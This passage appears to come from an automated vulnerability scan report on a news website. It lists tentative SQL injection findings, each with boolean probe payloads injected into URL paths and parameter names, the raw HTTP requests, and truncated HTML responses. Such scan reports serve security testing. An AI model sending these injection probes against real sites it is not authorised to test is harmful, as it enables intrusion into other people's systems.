property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="The United States demanded the immediate release of an American diplomat arrested in the shooting deaths of two Pakistan men, saying Saturday that the man had immunity from prosecution." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 12:42:15 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
<link ...[SNIP]...
Request 2
GET /id/41324344%20and%201%3d2--%20/ns/world_news-south_and_central_asia/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:55:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 72882
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1033648484 --> <title>U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" property="og:url" /><meta content="2011-01-29T12:42:15" property="og:updated" /><meta content="U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com" name="title" /><meta content="U.S. demands release of diplomat who killed 2" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Pakistan, World News, Pakistan, US, Asia, Embassies, Violent crime, Diplomacy, Crime, General news, International relations, Government and politics, Article, u, AP" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.jpg" name="Search.Image" /><meta content="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="The United States demanded the immediate release of an American diplomat arrested in the shooting deaths of two Pakistan men, saying Saturday that the man had immunity from prosecution." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 12:42:15 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" /> <link href="http://assets1c.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
<link ...[SNIP]...
1.117. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41326456/ns/business-media_biz/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:57:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 62522
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:1695234872 --> <title>Comcast takes control of NBC Universal - Business - Media biz - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" property="og:url" /><meta content="2011-01-29T16:46:09" property="og:updated" /><meta content="Comcast takes control of NBC Universal - Business - Media biz - msnbc.com" name="title" /><meta content="Comcast takes control of NBC Universal " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Comcast, Cable television, U.S. News, Business, Entertainment, US, Article, Entertainment & Leisure, Telecom, Manufacturing, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Comcast, the nation's largest cable TV company, has acquired a majority stake in NBC Universal, the owner of the fourth-ranked NBC broadcast network, a bevy of cable channels and the Universal Pictures movie studio." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 16:46:09 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:57:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 62578
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>Comcast takes control of NBC Universal - Business - Media biz - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" property="og:url" /><meta content="2011-01-29T16:46:09" property="og:updated" /><meta content="Comcast takes control of NBC Universal - Business - Media biz - msnbc.com" name="title" /><meta content="Comcast takes control of NBC Universal " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Comcast, Cable television, U.S. News, Business, Entertainment, US, Article, Entertainment & Leisure, Telecom, Manufacturing, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Comcast, the nation's largest cable TV company, has acquired a majority stake in NBC Universal, the owner of the fourth-ranked NBC broadcast network, a bevy of cable channels and the Universal Pictures movie studio." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 16:46:09 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 22723550%20or%201%3d1--%20 and 22723550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:07:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <img alt="Image: Members of the Afghan parliament congratulate each other after an inauguration ceremony in Kabul" src="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/110126-afghan-hmed-240a.thumb-s.jpg" width="60" height="40" /> </li>
</ul>
<h6>
<span class="label">Next story in Afghanistan</span> <a href="http://www.msnbc.redacted/id/41269044/ns/world_news-south_and_central_asia/" title="View next story"> Afghan president inaugurates new parliament </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia4.redacted/j/reuters/2011-01-29 ...[SNIP]...
Request 2
GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:07:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <img alt="" src="http://msnbcmedia4.redacted/j/ap/afghanistan explosion--304104217_v2.thumb-s.jpg" width="60" height="41" /> </li>
</ul>
<h6>
<span class="label">Next story in Afghanistan</span> <a href="http://www.msnbc.redacted/id/41312204/ns/world_news-south_and_central_asia/" title="View next story"> Taliban: Deadly store blast targeted Xe worker </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41327238/ns'%20and%201%3d1--%20/us_news-crime_and_courts/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:11:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 64654
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847499 --> <title>Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" property="og:url" /><meta content="2011-01-30T00:08:46" property="og:updated" /><meta content="Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com" name="title" /><meta content="Mom charged in kids' slayings treated at hospital" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="TAMARA LUSH" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Julie Powers Schenecker, Tampa, Florida, U.S. News, Florida, US, Crime, Violent crime, General news, Article, r, AP" name="keywords" property="og:tags" /><meta content="/ap/tampa%20teens%20shot--1273670434_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/ap/tampa teens shot--1273670434_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="The army officer's wife who authorities say killed her teenage daughter and son because she was fed up with them talking back did not appear in court Saturday because she's being treated at a hospital for an unknown condition. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:08:46 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-tou ...[SNIP]...
Request 2
GET /id/41327238/ns'%20and%201%3d2--%20/us_news-crime_and_courts/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:11:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 64599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:129150931 --> <title>Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" property="og:url" /><meta content="2011-01-30T00:08:46" property="og:updated" /><meta content="Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com" name="title" /><meta content="Mom charged in kids' slayings treated at hospital" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="TAMARA LUSH" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Julie Powers Schenecker, Tampa, Florida, U.S. News, Florida, US, Crime, Violent crime, General news, Article, r, AP" name="keywords" property="og:tags" /><meta content="/ap/tampa%20teens%20shot--1273670434_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/ap/tampa teens shot--1273670434_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="The army officer's wife who authorities say killed her teenage daughter and son because she was fed up with them talking back did not appear in court Saturday because she's being treated at a hospital for an unknown condition. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:08:46 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch ...[SNIP]...
1.120. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41327817/ns/world_news-mideastn_africa/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13122174%20or%201%3d1--%20 and 13122174%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:56:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 181115
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:485381290 --> <title>U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" property="og:url" /><meta content="2011-01-30T01:05:41" property="og:updated" /><meta content="U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com" name="title" /><meta content="Obama urges restraint, reform in Egypt" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Barack Obama, Omar Suleiman, Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_viq_wh_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="President Barack Obama issued a plea for restraint in Egypt after meeting with national security aides Saturday to assess the Cairo government's response to widespread protests threatening the stability of the country. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:05:41 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:56:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 181247
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" property="og:url" /><meta content="2011-01-30T01:05:41" property="og:updated" /><meta content="U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com" name="title" /><meta content="Obama urges restraint, reform in Egypt" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Barack Obama, Omar Suleiman, Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_viq_wh_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="President Barack Obama issued a plea for restraint in Egypt after meeting with national security aides Saturday to assess the Cairo government's response to widespread protests threatening the stability of the country. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:05:41 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16798619'%20or%201%3d1--%20 and 16798619'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41327924/ns16798619'%20or%201%3d1--%20/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:15:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 181106
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847500 --> <title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of globa ...[SNIP]...
Request 2
GET /id/41327924/ns16798619'%20or%201%3d2--%20/world_news-europe/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:15:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 180953
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:935719984 --> <title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of global ...[SNIP]...
1.122. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41327924/ns/world_news-europe/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 43673560%20or%201%3d1--%20 and 43673560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
